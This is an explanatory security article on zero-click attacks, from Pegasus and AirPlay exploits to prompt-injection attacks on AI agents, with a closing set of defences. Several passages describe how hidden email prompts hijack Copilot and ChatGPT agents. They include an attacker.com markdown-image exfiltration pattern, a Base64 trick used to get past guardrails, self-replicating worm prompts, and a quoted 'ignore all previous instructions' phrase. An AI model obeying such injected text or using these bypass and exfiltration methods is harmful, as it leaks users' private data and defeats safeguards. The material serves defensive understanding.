Zero-Click Cyber Attacks & AI Agents

In the rapidly evolving landscape of cybersecurity threats, a new and profoundly dangerous class of attack has emerged: the zero-click cyber attack. These sophisticated, interaction-less exploits fundamentally redefine digital defense, bypassing traditional user-centric security paradigms and posing an unprecedented risk to individuals, corporations, and the burgeoning ecosystem of autonomous Artificial Intelligence (AI) agents. This detailed article dives deep into the world of zero-click attacks, exploring their mechanics, prominent examples like NSO Group's Pegasus spyware, and their alarming convergence with AI-powered systems. We also discuss essential mitigation strategies and the critical need for a Zero Trust architecture in the face of these invisible intrusions and automated threats. Understanding zero-click cyber attacks is no longer optional; it's an existential necessity for anyone navigating the modern digital world.

TL:DR

---

Zero-click attacks are highly advanced cyber exploits that compromise devices without any user interaction. They target vulnerabilities in applications that automatically process untrusted data, rendering traditional user-awareness defenses obsolete. Notable examples include NSO Group's Pegasus spyware, delivered via exploits like FORCEDENTRY and BLASTPAST in messaging apps like iMessage, and "wormable" vulnerabilities in wireless protocols like Apple's AirPlay. The newest frontier for these threats is AI agents, which can be hijacked through "semantic exploits" like EchoLeak and ShadowLeak. These attacks leverage hidden prompts to turn AI agents into data exfiltration tools from within cloud environments. Furthermore, offensive AI is now capable of autonomously discovering and generating zero-day exploits at machine speed, drastically shrinking the "exploit window." The emergence of AI worms like "Morris II," which self-replicate through generative AI ecosystems, signals a new era of automated cyber threats. The proliferation of vulnerable IoT devices creates a vast attack surface for these AI-powered botnets. To counter these threats, a multi-layered defense is crucial, including vigilant patch management, network segmentation, input sanitization for AI, the principle of least privilege for AI agents, and the deployment of defensive AI. Ultimately, a Zero Trust architecture is essential to combat these invisible, automated compromises.

Index

---

Anatomy of an Invisible Threat: Deconstructing the Zero-Click Attack

---

The emergence of zero-click attacks represents a significant and dangerous evolution in the tradecraft of cyber adversaries. Unlike the majority of cyberattacks that rely on some form of human error or manipulation, these exploits operate in a realm of pure technical compromise, subverting the foundational security assumption that a vigilant user can serve as a line of defense. This section provides a formal definition of the zero-click paradigm, dissects the technical mechanics that enable such intrusions, and maps the lifecycle of a typical attack, highlighting the characteristics of stealth and persistence that make them one of the most formidable threats in the modern digital landscape. Understanding these invisible threats is crucial for modern cybersecurity.

Defining the Paradigm Shift: Interaction-less Exploitation

A zero-click attack, also referred to as an interaction-less or fully remote attack, is a cyber exploit that successfully compromises a target device or system without requiring any action whatsoever from the victim. This defining characteristic places it in stark contrast to the vast majority of prevalent cyber threats, such as phishing, spear-phishing, smishing, and malware campaigns that depend on social engineering. These traditional methods are fundamentally predicated on deceiving a user into performing a specific action—clicking a malicious link, opening a compromised attachment, installing a rogue application, or divulging credentials. The success of a zero-click attack is entirely independent of the user's behavior, knowledge, or level of security awareness.

The core principle enabling this paradigm is the exploitation of vulnerabilities within the code of applications or services that are designed to automatically accept and process data from untrusted sources. This automatic processing occurs before the data is ever presented to the user for a decision. Common examples of such applications include email clients, VoIP services, and instant messaging platforms. These services are perpetually "listening" for incoming data packets, messages, or calls. A well-crafted, malicious piece of data can trigger a latent vulnerability in the application's data-parsing or rendering engine upon receipt, leading to arbitrary code execution on the device. For instance, a smartphone displaying a notification for a new text message must first process the contents of that message to generate the preview; it is this pre-emptive, automated processing that a zero-click attack leverages as its execution trigger.

The direct consequence of this attack model is the complete nullification of the user as a security control. Even the most technically proficient and security-conscious individuals are rendered vulnerable because the attack provides no opportunity for detection or intervention. There is no suspicious link to avoid, no unexpected attachment to scrutinize. The compromise can occur silently, perhaps signaled only by a phantom missed call notification or no discernible indicator at all. This fundamentally breaks traditional security models that invest heavily in user awareness training as a critical defense layer. The "human firewall," a concept central to many enterprise security strategies, is rendered entirely obsolete in the face of such a threat. The focus of vulnerability shifts from human psychology to the inherent trust that software applications place in the data they are built to process. This necessitates a strategic reorientation of defensive efforts, moving away from a primary reliance on user behavior and toward a much greater emphasis on rigorous code security, comprehensive vulnerability management, and architecturally sound software design, such as robust sandboxing of data-processing components.

The Mechanics of Compromise: Vulnerabilities and Vectors

Zero-click attacks are not a monolithic category; they leverage a diverse range of technical vulnerabilities across a wide array of vectors. The common thread is that the target vector must be a service or protocol that automatically processes incoming data from potentially untrusted sources. The attack surface for these exploits is not defined by traditional open ports on a server but by any "listening" application on an endpoint device.

Common Attack Vectors for Zero-Click Exploits:

• Messaging Platforms: Applications such as Apple's iMessage, WhatsApp, Telegram, Signal, and standard SMS/MMS services are primary targets. Their core function is to receive and process messages, which may contain rich content like images, videos, GIFs, and link previews. This provides a broad surface for attackers to send specially crafted data that is automatically parsed by the recipient's device.
• Email Clients: Email clients like Microsoft Outlook and Apple Mail are also significant vectors. Vulnerabilities can be triggered simply by the client receiving a malicious email, or by the automatic rendering of content in a preview pane, without the user ever opening the message itself.
• Voice over IP (VoIP) and Video Conferencing: Services that handle real-time voice and video calls, such as WhatsApp, FaceTime, and Skype, can be exploited. An attack can be initiated by a specially crafted call that triggers a vulnerability in the handling of session initiation packets. Famously, some attacks have been delivered via a missed call, which the victim may not even see in their call log.
• Wireless Protocols: Local-area wireless protocols provide another potent vector. Attackers in physical proximity can send malicious data packets over Wi-Fi, Bluetooth, or Near Field Communication (NFC) to a device that is actively scanning for connections. The "AirBorne" vulnerabilities in Apple's AirPlay protocol are a critical example of this, allowing attacks to be delivered over a shared Wi-Fi network to any listening device.

Underlying Vulnerability Classes:

The exploits delivered through these vectors typically fall into two broad technical categories:

• Memory Corruption Vulnerabilities: This is the most common class of vulnerability exploited by sophisticated zero-click attacks. These are programming errors that allow an attacker to write to memory locations outside of the intended buffer. By sending a carefully constructed piece of data (e.g., a malformed image file), an attacker can overwrite critical memory structures, such as the instruction pointer, to redirect the program's execution flow to their own malicious code (the payload). Key types include:
  • Buffer Overflows: Occur when a program attempts to write more data to a fixed-length memory buffer than it can hold, overwriting adjacent memory. The 2019 WhatsApp VoIP exploit was a buffer overflow vulnerability.
  • Integer Overflows: A type of arithmetic overflow that occurs when a calculation results in a number that is too large for the integer type used to store it. This can lead to flawed memory allocation calculations, resulting in a buffer that is too small, which can then be overflowed. The FORCEDENTRY exploit leveraged an integer overflow in Apple's CoreGraphics library.
  • Use-After-Free: This occurs when a program continues to use a pointer to a memory location after that memory has been deallocated (freed). An attacker can potentially gain control of this freed memory block and insert their own data, which the program will then execute when it erroneously uses the old pointer.
• Logic Flaws: These are vulnerabilities that do not involve corrupting memory but rather exploit flaws in the program's intended logic. An attacker might provide data in an unexpected but syntactically valid format that causes the application to perform an unsafe action. For example, a vulnerability in Microsoft Outlook was triggered by a specially crafted calendar reminder that caused the application to leak NTLM hashes to an external server upon processing, without any user interaction.

The Attack Lifecycle: Stealth and Persistence

A successful zero-click attack is a multi-stage process characterized by an exceptional degree of stealth, designed to achieve its objectives while remaining completely invisible to the target. The lifecycle can be broken down into four key phases:

1. Delivery: The initial phase involves the attacker sending the malicious data payload to the target device through one of the vectors described previously. This could be an iMessage containing a malicious PDF disguised as a GIF, a specially formed series of data packets sent to a device's Wi-Fi chipset, or a VoIP call that is never answered. The delivery is often highly targeted, directed at a specific individual's phone number or user account.
2. Exploitation: Upon receipt, the vulnerable application on the target device automatically begins to process the malicious data. This triggers the underlying vulnerability—be it a memory corruption bug or a logic flaw—allowing the attacker's shellcode to be executed on the device, typically with the privileges of the compromised application. This is the critical, interaction-less moment of compromise.
3. Installation and Persistence: Once the initial code is executed, its primary goal is to install a more comprehensive malicious payload, such as the Pegasus spyware. This often involves escalating privileges on the device. In some cases, the malware will perform a "jailbreak" on the device, a process that removes software restrictions imposed by the operating system, thereby gaining deep, persistent access to the entire system, including sensitive data, the microphone, and the camera.
4. Evasion and Cleanup: A hallmark of sophisticated zero-click attacks is their meticulous effort to erase all traces of the intrusion. The initial delivery vector, such as the malicious message or the entry in the call log, is programmatically deleted from the device. Any notifications that might have alerted the user to the incoming message or call are suppressed. The malware itself is often designed with anti-forensic and self-destruct capabilities, making it volatile and extremely difficult to detect through later analysis. This extreme stealth ensures that the victim remains unaware of the compromise for a prolonged period, allowing the attacker to conduct long-term surveillance and data exfiltration without interruption.

This entire lifecycle, from delivery to persistent compromise, can be completed in seconds, transforming a fully patched, state-of-the-art device into a comprehensive surveillance tool without the user ever knowing.

Landmark Exploits and the Geopolitical Landscape

---

The theoretical potential of zero-click attacks has been made terrifyingly concrete through a series of high-profile exploits discovered in the wild. These incidents not only provide invaluable technical case studies but also illuminate the strategic context in which these powerful cyber weapons are developed and deployed. The analysis of these landmark exploits reveals a sophisticated commercial marketplace for surveillance tools and a clear arms race between attackers and platform defenders. It also demonstrates that the attack surface extends far beyond mobile messaging apps to encompass a wide ecosystem of interconnected devices and protocols. These events highlight the critical need for robust cybersecurity defenses against zero-click exploits.

Case Study: The Pegasus Saga and NSO Group's Arsenal

No entity is more synonymous with zero-click attacks than the NSO Group, an Israeli cyber-intelligence firm. Its flagship product, the Pegasus spyware, is a highly advanced surveillance tool sold exclusively to government clients for the stated purpose of combating terrorism and serious crime. However, extensive investigations by organizations like Citizen Lab and Amnesty International have repeatedly shown Pegasus being used to target journalists, human rights activists, lawyers, and political opponents in numerous countries, turning their own devices against them. The delivery of Pegasus has consistently relied on some of the most sophisticated zero-click exploits ever discovered.

Technical Deep Dive: FORCEDENTRY (CVE-2021-30860)

Discovered in 2021 on the iPhone of a Saudi activist, FORCEDENTRY was a zero-day, zero-click exploit against Apple's iMessage that was remarkable for its complexity and its ability to bypass advanced security mitigations.

• Vector and Vulnerability: The attack was delivered via iMessage. The payload was hidden in files that were maliciously crafted but disguised with a .gif extension to evade simple filtering. In reality, these files were Adobe PSD and PDF documents. The core vulnerability was an integer overflow flaw in Apple's CoreGraphics image rendering library. Specifically, the flaw resided in the code responsible for parsing JBIG2-encoded data streams, a format used for lossless image compression often found within PDF files. By sending a PDF with a maliciously constructed JBIG2 segment, an attacker could trigger the integer overflow, leading to a heap buffer overflow and, ultimately, arbitrary code execution.
• Circumvention of BlastDoor: What made FORCEDENTRY particularly significant was its ability to defeat "BlastDoor," a hardened sandbox environment Apple had introduced in iOS 14. BlastDoor was specifically designed to isolate and securely process all untrusted data coming into iMessage, with the express purpose of preventing the exact type of memory corruption exploits that NSO Group had used in the past. FORCEDENTRY was engineered to find a flaw in a library called by BlastDoor, effectively punching a hole through this purpose-built defense. This demonstrated a clear, adaptive, and resource-intensive effort by NSO Group to overcome Apple's latest security measures, highlighting the escalatory nature of the arms race between attackers and defenders in the cybersecurity landscape.

Technical Deep Dive: BLASTPAST (CVE-2023-4863)

A more recent exploit chain, identified in 2023 and used to target journalists in India, showed NSO Group's continued ability to find and weaponize zero-day, zero-click vulnerabilities.

• Vector and Vulnerability: BLASTPAST was a multi-stage attack. Forensic analysis showed that the initial stage involved triggering numerous crashes in the Apple HomeKit service daemon (homed). This was immediately followed by the delivery of malicious Apple Wallet pass files (.pkpass) via iMessage. These files contained an embedded WebP image. The exploit targeted a critical heap buffer overflow vulnerability (CVE-2023-4863) in libwebp, the open-source library widely used for rendering WebP images. When iMessage's BlastDoor sandbox automatically processed the .pkpass file to render a preview, it invoked the vulnerable libwebp library, triggering the exploit and compromising the device.
• Ecosystem Vulnerability: The use of a vulnerability in a widely used, third-party library like libwebp is significant. It shows that even if Apple's own code is secure, vulnerabilities in the vast ecosystem of open-source components that modern operating systems rely on can provide a pathway for compromise, highlighting the importance of comprehensive supply chain security in mitigating zero-click threats.

These cases illustrate the existence of a highly capable and well-funded commercial enterprise dedicated to producing nation-state-level cyber weapons. The business model of firms like NSO Group has effectively lowered the barrier to entry for governments to acquire these advanced capabilities, which might have otherwise been beyond their indigenous technical reach. This commercialization has led to the proliferation of powerful surveillance tools and their documented abuse against civil society, creating significant geopolitical and human rights implications.

Beyond Pegasus: The Broadening Attack Surface

While the Pegasus exploits are the most famous, zero-click vulnerabilities are not limited to NSO Group or mobile messaging platforms. Research has uncovered similar flaws across a range of software and protocols, demonstrating that this is a broad and persistent class of cyber threat.

• Microsoft Outlook Vulnerabilities: Flaws have been discovered in Microsoft Outlook that enable remote code execution without user interaction. One such vulnerability was triggered by the processing of a specially crafted email containing a malicious calendar reminder. The reminder's PidLidReminderFileParameter property could be set to a UNC path pointing to an attacker-controlled server. When Outlook processed this reminder in the background, it would automatically attempt to connect to the server, leaking the user's Net-NTLMv2 hash, which could then be cracked offline to reveal the user's password. This demonstrates a logic-based zero-click attack, distinct from the memory corruption bugs used by Pegasus.
• "AirBorne" Wireless Exploits: In 2025, security researchers disclosed a suite of 17 vulnerabilities in Apple's AirPlay wireless streaming protocol, collectively dubbed "AirBorne." This research dramatically expanded the conceptual attack surface for zero-click attacks beyond internet-based messaging.
  • Ecosystem-Wide Vector: The vulnerabilities affect the AirPlay protocol itself, meaning any device implementing it is potentially at risk. This includes not only Apple's own products (macOS, iPhones, Apple TV) but also a vast ecosystem of third-party devices that use the AirPlay SDK, such as smart speakers, AV receivers, and in-vehicle infotainment systems.
  • Wormable Potential: Critically, several of the discovered vulnerabilities, such as CVE-2025-24252 (a use-after-free bug) and CVE-2025-24132 (a stack-based buffer overflow), were found to be "wormable." This means that once an attacker compromises a single device on a local network via a zero-click AirPlay exploit, the malware on that device can autonomously scan for and infect other vulnerable AirPlay-enabled devices on the same network. This allows for rapid, automated lateral movement through an enterprise or home network, a capability that represents a severe escalation of the threat.
• Router-based Attacks: The threat also extends to network infrastructure. The "Cuttlefish" malware, for example, was discovered targeting small office/home office (SOHO) and enterprise-grade routers. Once a router is compromised, Cuttlefish can passively sniff all network traffic passing through it, stealing authentication credentials for cloud services and other resources. This is, in effect, a network-level zero-click attack, as the end-user devices are compromised without any direct interaction; their data is simply intercepted and stolen at the network gateway.

The AirBorne vulnerabilities, in particular, signify a crucial evolution in understanding this threat. The attack vector shifts from a single application (like iMessage) to an entire protocol ecosystem. A single flaw in a protocol like AirPlay creates a vulnerability across a diverse and fragmented landscape of devices from numerous manufacturers, many of whom may be slow to issue patches, if they do at all. This makes the attack surface vastly larger and harder to secure, demonstrating that the protocols connecting our devices are now a primary battleground for zero-click exploits.

Comparative Analysis of Major Zero-Click Exploits

To synthesize the technical and strategic characteristics of these landmark exploits, the following table provides a comparative analysis. This structure highlights the patterns in attack vectors, the types of vulnerabilities exploited, and the continuous evasion of defensive measures over time, crucial information for understanding the dynamic nature of zero-click cyber attacks.

The AI Nexus: Agents as the New Frontier

---

The principles of zero-click exploitation are now converging with the most transformative technology of the modern era: Artificial Intelligence (AI). This intersection is creating a new frontier for cyber threats, one that is fundamentally different from the memory-corruption-based attacks of the past. AI agents—autonomous systems powered by Large Language Models (LLMs) that can reason, plan, and interact with digital environments—are emerging as a powerful new attack surface. Simultaneously, AI itself is being weaponized, with research demonstrating its potential to automate the discovery and generation of novel exploits at an unprecedented speed and scale. This section explores this dual-edged sword, analyzing how AI agents are targeted by a new class of "semantic zero-click attacks" and how offensive AI is poised to reshape the entire threat landscape, profoundly impacting cybersecurity strategies.

AI Agents as a Vulnerable Attack Surface: The Rise of Semantic Exploits

The first generation of zero-click attacks exploited vulnerabilities at a low level of the computing stack, targeting flaws in how binary data is parsed and handled in memory. The new generation of attacks targeting AI agents operates at a much higher level of abstraction: the semantic layer. These exploits do not corrupt memory; they corrupt meaning. They hijack the reasoning process of an autonomous agent by feeding it maliciously crafted, but seemingly benign, natural language instructions hidden within untrusted data sources. The vulnerability lies not in a C++ library, but in the logic of the LLM and the trust an organization places in its automated capabilities, posing a unique challenge to AI security.

Technical Deep Dive: EchoLeak (CVE-2025-32711) in Microsoft 365 Copilot

The EchoLeak vulnerability, discovered by researchers at Aim Labs, was one of the first public demonstrations of a zero-click attack against a major production AI system.

• Vector and Vulnerability: The attack begins when an adversary sends a standard email to a user within a target organization. This email contains a hidden malicious prompt, concealed from the human reader using techniques such as white-on-white text or HTML comment tags (). The vulnerability is rooted in the architecture of Microsoft 365 Copilot, specifically its use of a Retrieval-Augmented Generation (RAG) engine. RAG systems are designed to improve the quality of LLM responses by providing them with relevant, up-to-date context retrieved from a knowledge base—in this case, the user's Microsoft 365 data, including their emails.
• Zero-Click Execution: The attack remains dormant until the victim interacts with Copilot for a completely unrelated, legitimate task (e.g., "Summarize my recent project updates"). To fulfill this request, Copilot's RAG engine scans the user's recent data for context and retrieves the attacker's poisoned email. The hidden prompt within that email is then fed into the LLM's context window along with the legitimate data. The LLM, unable to distinguish between user-provided instructions and instructions embedded in retrieved data, executes the attacker's command. A demonstrated payload instructed Copilot to search for sensitive internal documents, summarize them, and then exfiltrate the summary by embedding it within a markdown image URL (![data](https://attacker.com/...)). When the Copilot interface rendered this markdown, the client automatically made a request to the attacker's server, leaking the data. The user never had to open, click, or even see the malicious email for the compromise to occur. This type of exploit has been termed an "LLM Scope Violation," where the AI is tricked into violating its intended data access boundaries.

Technical Deep Dive: ShadowLeak in ChatGPT Deep Research Agent

The ShadowLeak vulnerability, discovered by Radware researchers, demonstrated a similar principle but with a critical distinction in its exfiltration method.

• Vector and Vulnerability: As with EchoLeak, the attack vector is a malicious email sent to a user whose AI agent (in this case, ChatGPT's Deep Research agent) is connected to their Gmail account for data processing. The email contains a hidden indirect prompt injection with instructions for the agent.
• Zero-Click Execution and Evasion: When the user prompts the agent with a general request like "research my inbox," the agent ingests the malicious email along with all others. The hidden prompt instructs the agent to find specific Personally Identifiable Information (PII) within the user's other emails and send it to an attacker-controlled URL. The researchers discovered that simple exfiltration attempts were blocked by OpenAI's safety guardrails. The key to a successful exploit was a multi-step instruction: first, the agent was told to Base64-encode the stolen PII, and then append the resulting harmless-looking string to the exfiltration URL. This obfuscation bypassed the guardrails that were looking for raw PII in outbound requests.
• Service-Side Exfiltration: Crucially, the exfiltration in the ShadowLeak attack was service-side. The agent's own internal browsing tool made the malicious web request directly from OpenAI's cloud servers. This is fundamentally different from client-side exfiltration (like EchoLeak's markdown rendering), as it leaves no trace on the user's device or corporate network logs, making it virtually undetectable by conventional security monitoring.

These cases reveal a profound shift in the nature of the attack vector. The battleground has ascended the technology stack from the binary data-parsing layer to the abstract, semantic layer of natural language processing. Traditional security tools, which are built to analyze code and network packets, are completely blind to these threats. Defending against them requires an entirely new class of security focused on prompt analysis, context segregation, and behavioral monitoring of AI agents themselves.

Offensive AI: The Automation of Exploit Generation

The dual-use nature of AI means that while it creates new vulnerabilities, it also provides powerful new tools for attackers. Groundbreaking research is now demonstrating that AI agents can automate the complex and time-consuming process of discovering and writing exploit code, a development that threatens to fundamentally alter the dynamics of vulnerability management and accelerate the pace of cyber threats.

• From One-Day to Zero-Day Exploitation: Initial research established that highly capable LLMs like GPT-4 can be weaponized to exploit "one-day" vulnerabilities—flaws that have been publicly disclosed and for which a patch is available. In one academic study, a GPT-4-based agent was given CVE descriptions and was able to autonomously develop working exploits for 87% of the vulnerabilities in a test set, a task where all other models and traditional open-source scanners failed completely.
• The Advent of Autonomous Zero-Day Hacking: More alarmingly, subsequent research has proven that AI agents can succeed in the true "zero-day" scenario, where no description of the vulnerability is provided. The paper "Teams of LLM Agents can Exploit Zero-Day Vulnerabilities" introduced a multi-agent framework called HPTSA (Hierarchical Planning and Task-specific Agents) that successfully exploited real-world vulnerabilities without prior knowledge.
• Methodology of an AI Hacking Team: The HPTSA framework overcomes the limitations of a single LLM agent (such as limited context length and difficulty in long-range planning) by creating a collaborative team of specialized agents:
  • A Planning Agent first performs reconnaissance on the target system (e.g., a web application), exploring its structure and identifying potentially vulnerable components, such as login pages or file upload forms.
  • This high-level plan is passed to a Team Manager Agent, which then decomposes the plan into specific tasks and dispatches them to a pool of "expert" agents.
  • Expert Agents are LLMs that have been prompted or fine-tuned to specialize in finding and exploiting specific classes of vulnerabilities, such as SQL Injection (SQLi), Cross-Site Scripting (XSS), or Remote Code Execution (RCE).
• Implications: The Collapse of the Exploit Window: The success of these offensive AI systems has dire implications for cybersecurity defense. The process of a human researcher analyzing a newly disclosed vulnerability and developing a working proof-of-concept exploit can take days, weeks, or even months. This time gap, often called the "exploit window," is what gives organizations a chance to apply patches before attacks become widespread. AI-driven systems can shrink this window to mere minutes. This suggests a future where a working exploit for any publicly disclosed vulnerability could be generated and distributed almost instantaneously. This would render reactive, patch-cycle-based security models obsolete and force a move towards proactive, architecture-based defenses where compromise is assumed to be an imminent and constant threat.

Adversarial Machine Learning and the AI Worm

Extending the concept of offensive AI further is the application of adversarial machine learning (AML) to create self-propagating malware that targets AI ecosystems. AML is a field of study focused on crafting inputs that are specifically designed to deceive or manipulate machine learning models.

• Case Study: The "Morris II" AI Worm: A seminal research project from Cornell Tech, Technion, and Intuit demonstrated the creation of the first generative AI worm, named "Morris II" in homage to the original 1988 internet worm.
• Mechanism of Propagation: The worm operates using an "adversarial self-replicating prompt." This is a carefully constructed piece of text that, when processed by a GenAI model, achieves two goals:
  • Replication: It instructs the model to include the entire malicious prompt itself within its generated output.
  • Payload: It instructs the model to perform a malicious action, such as exfiltrating sensitive data or sending spam.
• Zero-Click Propagation in an Email Ecosystem: The researchers demonstrated the worm in the context of a GenAI-powered email assistant. An attacker sends an initial email containing the adversarial prompt. The victim's email assistant, in the course of its normal, automated operations (e.g., summarizing new emails), processes the malicious message. This triggers the worm. The payload could instruct the agent to find sensitive data in the user's other emails and then compose a reply to a different contact. The worm's replication instruction ensures that the malicious prompt is embedded within this new outgoing email. When the recipient's AI assistant processes that email, the cycle repeats, and the worm propagates through the ecosystem. This entire propagation process occurs automatically, as a result of the agents' normal functioning, requiring zero clicks from any of the human users involved.

The emergence of AI agents has created a powerful "trust tax" on automation. The very capabilities that make these agents useful—their autonomy and their connectivity to data and tools—are the same capabilities that make them such a potent security risk. Every permission granted and every data source connected to an AI agent is not merely a feature enhancement; it is a deliberate expansion of a potential blast radius that can be exploited by a new generation of semantic zero-click attacks, underscoring the vital need for robust AI security measures.

The Future Battlefield: Evolving Threats and Expanded Surfaces

---

The trends identified in the preceding sections—the increasing sophistication of zero-click exploits and the disruptive potential of Artificial Intelligence—are not occurring in a vacuum. They are converging upon a digital landscape characterized by the explosive growth of interconnected devices. The proliferation of the Internet of Things (IoT) is creating a vast and largely unsecured attack surface, ripe for exploitation. This section will project the future of the threat landscape, analyzing how the convergence of advanced exploits and vulnerable IoT ecosystems will create novel and highly dangerous attack scenarios, potentially shifting the consequences of cyberattacks from the digital realm into the physical world, emphasizing the urgent demand for comprehensive cybersecurity solutions.

The Internet of Things (IoT) Proliferation: A World of Vulnerable Endpoints

The Internet of Things (IoT) refers to the vast network of physical devices—from consumer smart home gadgets and wearable technology to industrial sensors and critical infrastructure controls—that are embedded with software and connectivity, allowing them to exchange data over the internet. While this connectivity enables unprecedented efficiency and functionality, it has also introduced a massive and heterogeneous attack surface that is notoriously difficult to secure, creating significant challenges for IoT security.

The security posture of the IoT ecosystem is generally poor for several reasons:

• Insecure by Design: Many IoT devices, especially low-cost consumer products, are designed with functionality and time-to-market as primary considerations, often at the expense of security. They may lack basic security features, ship with hardcoded or default passwords, and have no mechanism for receiving software updates.
• Patching Challenges: Unlike traditional IT assets, IoT devices are often deployed in the field for years without maintenance. Firmware updates are infrequent, difficult to apply, or simply non-existent, meaning that known vulnerabilities can persist indefinitely.
• Lack of Visibility: In enterprise environments, the proliferation of "Shadow IoT"—devices connected to the corporate network without the knowledge or approval of the IT department—creates a massive security blind spot. Organizations cannot secure assets they are not aware of.
• Diverse Protocols and Standards: The IoT landscape is a fragmented ecosystem of proprietary and open-source protocols, making standardized security monitoring and control extremely challenging.

This environment of widespread, persistent vulnerability makes IoT devices prime targets for exploitation. Specific vectors that are particularly susceptible to zero-click or low-interaction attacks include:

• Consumer Electronics and Wireless Protocols: As demonstrated by the "AirBorne" vulnerabilities, wireless protocols like AirPlay, which are common in smart speakers, televisions, and other media devices, can be exploited by attackers in physical proximity to gain control of a device without any user interaction.
• Automotive Systems: Modern vehicles are complex networks of interconnected computers. Vulnerabilities in infotainment systems like Apple CarPlay or Android Auto, which often have wireless connectivity, could be exploited to perform malicious actions ranging from distracting the driver to eavesdropping on in-cabin conversations or tracking the vehicle's location.
• Smart Infrastructure: The increasing connectivity of public infrastructure in smart cities presents a risk of large-scale disruption. Traffic control systems, public Wi-Fi networks, and city-wide surveillance camera networks, if compromised, could be manipulated by attackers to cause chaos or conduct widespread surveillance.

Historically, the primary use for compromised IoT devices has been to herd them into massive botnets, such as the infamous Mirai botnet. These armies of infected devices are then used to launch Distributed Denial-of-Service (DDoS) attacks, send spam, or act as anonymizing proxies for other cybercriminal activities. However, the convergence of these vulnerable endpoints with the rise of offensive AI portends a much more sophisticated and dangerous future for cybersecurity.

The Convergence of Threats: The AI-Powered IoT Botnet

The future battlefield will be defined by the synthesis of the threats detailed throughout this report. The next evolution of the botnet will likely not be a blunt instrument for DDoS attacks but a sophisticated, intelligent, and stealthy network of compromised devices powered by AI.

A plausible future attack scenario could unfold as follows:

• AI-Driven Vulnerability Discovery: An attacker employs an offensive AI system, similar to the HPTSA framework, to autonomously scan the internet for zero-day vulnerabilities in the firmware of a widely deployed class of IoT devices, such as a specific brand of smart camera or SOHO router.
• Automated Exploit Generation: Upon discovering a vulnerability, the AI system automatically generates a working, wormable, zero-click exploit. This exploit might target a flaw in the device's wireless protocol stack or its data processing services.
• Rapid, Wormable Propagation: The exploit is unleashed, and it begins to propagate automatically from one vulnerable device to another across the internet or on local networks, similar to the AirBorne exploits but on a global scale. Millions of devices could be compromised in a matter of hours, without any user interaction.
• Deployment of an AI Agent Network: Instead of installing simple DDoS malware, the payload on each compromised device is a lightweight, specialized AI agent. This transforms the botnet from a centrally controlled army into a decentralized, intelligent swarm.
• Intelligent, Coordinated Attacks: This AI-powered botnet could then be used for far more sophisticated and stealthy attacks. For example, in an industrial control setting, compromised sensors could be instructed by their local AI agents to subtly manipulate data readings over time, causing physical process failures that appear to be mechanical faults rather than a cyberattack. In a corporate espionage scenario, compromised devices could intelligently coordinate to exfiltrate data slowly and through multiple channels to evade detection by traditional network security monitoring.

This convergence represents a critical shift in the nature of the threat, moving from attacks that primarily target the confidentiality and availability of data to attacks that can manipulate physical processes and have kinetic effects in the real world. A zero-click exploit against an industrial controller in a smart factory or the braking system of a connected car is not just about data theft; it is about causing physical damage, disrupting critical infrastructure, and potentially endangering human lives. The consequences of a successful zero-click attack are therefore escalating from financial and reputational harm to include tangible threats to public safety and national security. The "Shadow IoT" problem exacerbates this risk, creating a permanent state of unknown vulnerability within most large organizations, where undiscovered and unmanaged devices provide a persistent foothold for these advanced, automated threats, making robust cybersecurity defenses more crucial than ever.

A Multi-Layered Defense: Strategic Mitigation and Recommendations

---

The escalating sophistication and stealth of zero-click attacks, compounded by the disruptive potential of Artificial Intelligence, demand a fundamental rethinking of defensive strategies. A reactive, perimeter-based security model is no longer sufficient. Protection in this new era requires a multi-layered, proactive, and architecturally robust approach that addresses vulnerabilities from the foundational level of individual devices to the high-level policies of governments. This section outlines actionable mitigation strategies for individuals, corporations, and regulatory bodies, presenting a playbook for building resilience against these advanced cyber threats, emphasizing strong cybersecurity best practices.

Foundational Security Posture (For Individuals and Corporations)

Before addressing advanced threats, organizations and individuals must master the fundamentals of cyber hygiene. These foundational practices are the most effective first line of defense against the exploitation of known vulnerabilities.

• Vigilant Patch Management: The single most critical defense against the majority of zero-click attacks is the timely application of security patches. Exploits like FORCEDENTRY, BLASTPAST, and the Outlook vulnerabilities all targeted specific, patchable flaws. Keeping all operating systems, application software, and device firmware consistently up-to-date is paramount. Organizations should implement robust patch management programs, and individuals should enable automatic updates on their devices wherever possible.
• Attack Surface Reduction: The risk of compromise is directly proportional to the size of the attack surface. Both individuals and corporations should adopt a minimalist approach:
  • Uninstall Unnecessary Applications: Every application, particularly those with messaging or real-time communication capabilities, represents a potential "listening" surface. Removing unused or non-essential apps reduces the number of potential entry points for an attacker, enhancing overall cybersecurity.
  • Disable High-Risk Features: Features designed for convenience can introduce risk. For example, disabling automatic downloads of media files (images, videos) in messaging applications can prevent the automatic processing of a potentially malicious file. Similarly, disabling wireless protocols like Bluetooth or AirPlay when not in use reduces exposure to proximity-based attacks.
• Architectural Defenses (Corporate): For organizations, individual device hygiene must be supplemented with strong network architecture and security controls:
  • Network Segmentation: This is a crucial strategy for containing the impact of a breach. By dividing the corporate network into smaller, isolated segments, an organization can prevent an attacker from moving laterally. IoT devices, in particular, should be placed on a separate, restricted network segment, isolated from critical corporate servers and data repositories. This ensures that the compromise of a single smart speaker or camera does not provide a direct pathway to the company's core infrastructure.
  • Principle of Least Privilege: This principle dictates that any user, application, or device should only have the absolute minimum level of access and permissions required to perform its legitimate function. Strict enforcement of least privilege limits what an attacker can do even if they successfully compromise an endpoint.
  • Advanced Endpoint and Mobile Security: Deploying modern security solutions such as Endpoint Detection and Response (EDR) for computers and Mobile Threat Defense (MTD) for mobile devices is essential. These tools go beyond traditional signature-based antivirus, using behavioral analysis to detect anomalies that may indicate a compromise, such as unexpected process execution, attempts to escalate privileges, or communication with known command-and-control (C2) servers.

Defending the AI Ecosystem: A New Defensive Playbook

The emergence of semantic exploits targeting AI agents, such as EchoLeak and ShadowLeak, necessitates a new and specific set of defensive measures designed to secure the AI data-processing pipeline.

• Input Sanitization and Filtering: Since these attacks rely on injecting malicious instructions into the data that an AI processes, the first line of defense is to sanitize that data before it reaches the LLM.
  • Content Filtering: Implement robust filters that can detect and strip out known prompt injection patterns (e.g., "ignore all previous instructions and do this instead") and their many obfuscated variants. This can be done using regular expressions or, more effectively, a dedicated machine learning model trained to identify malicious prompts.
  • URL and Code Blocking: Automatically strip or neutralize any untrusted URLs or code snippets from incoming text before it is passed to the LLM. This prevents the AI from ever "seeing" a potential exfiltration endpoint or executable payload.
  • Restrict Rendering: In cases like EchoLeak, where data exfiltration occurs when the client renders a markdown image, restricting or disabling the rendering of markdown from AI-generated outputs can be an effective mitigation.
